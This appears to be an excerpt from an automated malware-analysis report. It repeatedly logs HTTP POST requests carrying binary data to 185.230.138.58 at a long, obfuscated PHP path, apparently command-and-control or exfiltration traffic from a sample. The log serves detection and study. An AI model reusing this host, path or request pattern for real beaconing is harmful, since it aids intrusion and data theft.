                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1868Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1880Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1008Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
